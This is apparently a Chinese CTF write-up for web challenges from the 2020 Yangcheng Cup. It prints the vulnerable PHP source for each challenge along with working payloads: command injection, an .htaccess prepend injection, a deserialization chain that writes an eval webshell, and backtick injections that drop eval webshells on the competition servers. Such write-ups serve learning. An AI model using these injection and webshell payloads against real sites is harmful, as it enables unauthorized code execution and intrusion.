2020年「羊城杯」网络安全大赛

2020-09-11 67次浏览 0条评论  前往评论

easycon


连接上蚁剑后,发现bbbbbbbbb.txt文件,base64解码保存为图片即可看到flag。

import base64
f = open(r'bbbbbbbbb.txt','r')
s = f.read()
f2 = open(r'1.txt','wb+')
flag = (base64.b64decode(s))
f2.write(flag)
f2.close()
f.close()

BlackCat


源码在

view-source:http://183.129.189.60:10022/Hei_Mao_Jing_Chang.mp3

源码为

<?php
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('谁!竟敢踩我一只耳的尾巴!');
}

$clandestine = getenv("clandestine");

if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);


$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if($hh !== $_POST['Black-Cat-Sheriff']){
    die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}

echo exec("nc".$_POST['One-ear']);

原题在:

https://neversecure.ca/category/bug-hunting/

exp

http://183.129.189.60:10022/
#post提交
Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat+flag.php&White-cat-monitor=%5B%5D

easyphp


源码为

 <?php
    $files = scandir('./');
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./');
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nHello, world");
?>

在网上可以找到原题:X-NUCA'2019—Ezphp

前提知识:

php.ini中有两项:

在所有页面的顶部与底部require文件

  • auto_prepend_file 在页面顶部加载文件

  • auto_append_file 在页面底部加载文件

例如:

.htaccess这个文件包含进所有的php页面

php_value auto_prepend_file .htaccess

然后对于stristr()的黑名单过滤直接用反斜杠即可绕过

对于后面拼接进来的"\nHello World"需要用反斜杠转义

payload

?content=php_value auto_prepend_fil\%0Ae .htaccess%0A%23<?php system('cat /f'.'lag');?>\&filename=.htaccess

easyser


首先访问robots.txt,提示Disallow: /star1.php/,源代码里有:

 <!--  小胖说用个不安全的协议从我家才能进ser.php呢  !-->

不安全协议用http访问:

http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/star1.php?path=http://127.0.0.1/sandbox/hrnh1cvpq4bvbm960878icaodb/ser.php

得到源码

<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} 
$flag='{Trump_:"fake_news!"}';

class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;

    }
    public function hasaki(){
        $d   = '<?php die("nononon");?>';
        $a= $d. $this->text;
         @file_put_contents($this-> file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}
?> 

很明显file_put_contents是要写shell进去,并且在内容前加了死亡函数,遂构造链条,这里触发__toString,但是没有地方可以触发,盲猜应该是echo unserialize的反序列入口。构造链如下:

$GWHT = new GWHT();
$GWHT->hero = new Yongen();
$GWHT->hero->file = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php';
$GWHT->hero->text = 'PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==';
$a = serialize($GWHT);
echo $a;

payload

http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/star1.php?path=http://127.0.0.1/sandbox/hrnh1cvpq4bvbm960878icaodb/ser.php&c=O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:{s:4:"file";s:77:"php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";s:4:"text";s:40:"PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==";}}

蚁剑连上在根目录/ffflag即可获得flag。

http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/shell.php
cmd

Easyphp2


首先用伪协议读取文件

http://183.129.189.60:10025/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php
http://183.129.189.60:10025/?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php

源码为:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>count is here</title>

    <style>

        html,
        body {
            overflow: none;
            max-height: 100vh;
        }
    </style>
</head>

<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">

<center><img src="question.jpg" height="200" width="200" /> </center>

    <?php
    ini_set('max_execution_time', 5);

    if ($_COOKIE['pass'] !== getenv('PASS')) {
        setcookie('pass', 'PASS');
        die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
    }
    ?>

    <h1>A Counter is here, but it has someting wrong</h1>

    <form>
        <input type="hidden" value="GWHT.php" name="file">
        <textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
        <input type="submit">
    </form>

    <?php
    if (isset($_GET["count"])) {
        $count = $_GET["count"];
        if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
            die('hacker!');
        }
        echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
    }
    ?>

</body>
</html>

首先可以用单引号嵌套反引号执行命令

http://183.129.189.60:10025/?file=GWHT.php&count='`ls > 1.txt`'

前提知识:

因为过滤了$_POST$_GET,需要可以用到get_defined_vars()

打印一个get_defined_vars()

array(4) { ["_GET"]=> array(0) { } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["pass"]=> string(4) "PASS" } ["_FILES"]=> array(0) { } } 

可以看到最外层是一个arrayarray的第一个值是_GET,如果我们在函数外层嵌套两层pos就可以获取到_GET的值了,下面就相当于一个一句话木马了。

eval(pos(pos(get_defined_vars())));

payload

http://183.129.189.60:10021/?file=GWHT.php&count='`echo "<?=eval(pos(pos(get_defined_vars())))?>">1.php`'

然后再写一个post的🐎

http://183.129.189.60:10021/1.php?a=file_put_contents('kkk.php', base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg=='));

又或者用next可以直接连接蚁剑

http://183.129.189.60:10021/?file=GWHT.php&count='`echo "<?=eval(pos(next(get_defined_vars())))?>">1.php`'

BreakTheWall


源码为

 <?php
error_reporting(0);
if(isset($_GET['c'])) {
  eval($_GET['c']);
}else {
  highlight_file(__FILE__);
}



登录后回复

共有0条评论